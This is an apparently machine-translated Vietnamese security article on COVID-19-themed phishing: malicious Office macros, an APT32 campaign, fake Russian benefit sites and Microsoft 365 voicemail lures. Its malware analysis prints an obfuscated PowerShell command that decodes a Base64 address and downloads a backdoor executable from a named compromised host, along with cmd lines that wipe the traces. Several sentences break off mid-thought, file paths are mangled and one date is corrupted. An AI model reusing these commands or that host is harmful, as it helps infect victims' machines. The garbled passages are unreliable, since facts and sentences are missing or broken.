Những kẻ tấn công tiếp tục khai thác chủ đề COVID-19, ngày càng tạo ra nhiều mối đe dọa hơn cho những người dùng quan tâm sâu sắc đến mọi thứ liên quan đến dịch bệnh. TRONG
Ghi nhớ trong
Bạn có muốn xét nghiệm miễn phí COVID-19 không?
Một ví dụ quan trọng khác về lừa đảo theo chủ đề virus Corona là
Thuyết phục hầu hết người dùng kích hoạt macro cũng dễ dàng. Để làm điều này, một thủ thuật tiêu chuẩn đã được sử dụng: để điền vào bảng câu hỏi, trước tiên bạn cần bật macro, nghĩa là bạn cần chạy tập lệnh VBA.
Như bạn có thể thấy, tập lệnh VBA được che giấu đặc biệt khỏi các phần mềm chống vi-rút.
Windows có tính năng chờ trong đó ứng dụng đợi /T <giây> trước khi chấp nhận câu trả lời mặc định là “Có”. Trong trường hợp của chúng tôi, tập lệnh đợi 65 giây trước khi xóa các tệp tạm thời:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Và trong khi chờ đợi, phần mềm độc hại đã được tải xuống. Một tập lệnh PowerShell đặc biệt đã được đưa ra cho việc này:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Sau khi giải mã giá trị Base64, tập lệnh PowerShell tải xuống backdoor nằm trên máy chủ web bị hack trước đó ở Đức:
http://automatischer-staubsauger.com/feature/777777.png
và lưu nó dưới tên:
C:UsersPublictmpdirfile1.exe
Thư mục ‘C:UsersPublictmpdir’
bị xóa khi chạy tệp 'tmps1.bat' chứa lệnh cmd /c mkdir ""C:UsersPublictmpdir"".
Tấn công có chủ đích vào các cơ quan chính phủ
Ngoài ra, các nhà phân tích của FireEye gần đây đã báo cáo về một cuộc tấn công APT32 có chủ đích nhằm vào các cơ quan chính phủ ở Vũ Hán, cũng như Bộ Quản lý Tình trạng Khẩn cấp của Trung Quốc. Một trong những RTF được phân phối có chứa liên kết đến một bài báo của New York Times có tựa đề
Điều thú vị là tại thời điểm phát hiện, không có phần mềm diệt virus nào phát hiện được trường hợp này, theo Virustotal.
Khi các trang web chính thức ngừng hoạt động
Ví dụ nổi bật nhất về một cuộc tấn công lừa đảo đã xảy ra ở Nga mới đây. Lý do cho điều này là do việc bổ nhiệm một quyền lợi đã được mong đợi từ lâu dành cho trẻ em từ 3 đến 16 tuổi. Khi thông báo bắt đầu nhận đơn đăng ký vào ngày 12 tháng 2020 năm XNUMX, hàng triệu người đã đổ xô đến trang web Dịch vụ Nhà nước để nhận được sự trợ giúp đã chờ đợi từ lâu và việc đánh sập cổng này không tệ hơn một cuộc tấn công DDoS chuyên nghiệp. Khi tổng thống nói rằng “Các dịch vụ của Chính phủ không thể đáp ứng được dòng đơn đăng ký”, mọi người bắt đầu nói chuyện trực tuyến về việc ra mắt một trang web thay thế để chấp nhận đơn đăng ký.
Vấn đề là một số trang web bắt đầu hoạt động cùng một lúc và trong khi một trang web thực sự tại posobie16.gosuslugi.ru thực sự chấp nhận đơn đăng ký, hơn thế nữa
Các đồng nghiệp từ SearchInform đã tìm thấy khoảng 30 miền lừa đảo mới trong vùng .ru. Công ty Infosecurity và Softline đã theo dõi hơn 70 trang web dịch vụ chính phủ giả mạo tương tự kể từ đầu tháng Tư. Những người sáng tạo ra chúng sử dụng các ký hiệu quen thuộc và cũng sử dụng sự kết hợp của các từ gosuslugi, gosuslugi-16, vyplaty, Covid-vyplaty, posobie, v.v.
Cường điệu và kỹ thuật xã hội
Tất cả những ví dụ này chỉ xác nhận rằng những kẻ tấn công đang kiếm tiền thành công từ chủ đề virus Corona. Và căng thẳng xã hội càng cao, vấn đề càng không rõ ràng thì kẻ lừa đảo càng có nhiều cơ hội đánh cắp dữ liệu quan trọng, buộc mọi người phải tự bỏ tiền hoặc đơn giản là hack thêm nhiều máy tính.
Và do đại dịch đã buộc những người có khả năng không được chuẩn bị trước phải làm việc tại nhà hàng loạt, không chỉ dữ liệu cá nhân mà cả dữ liệu của công ty cũng gặp rủi ro. Ví dụ: gần đây người dùng Microsoft 365 (trước đây là Office 365) cũng bị tấn công lừa đảo. Mọi người nhận được nhiều tin nhắn thoại “bị bỏ lỡ” dưới dạng tệp đính kèm trong thư. Tuy nhiên, các tập tin thực sự là một trang HTML gửi nạn nhân của cuộc tấn công tới
Nguồn: www.habr.com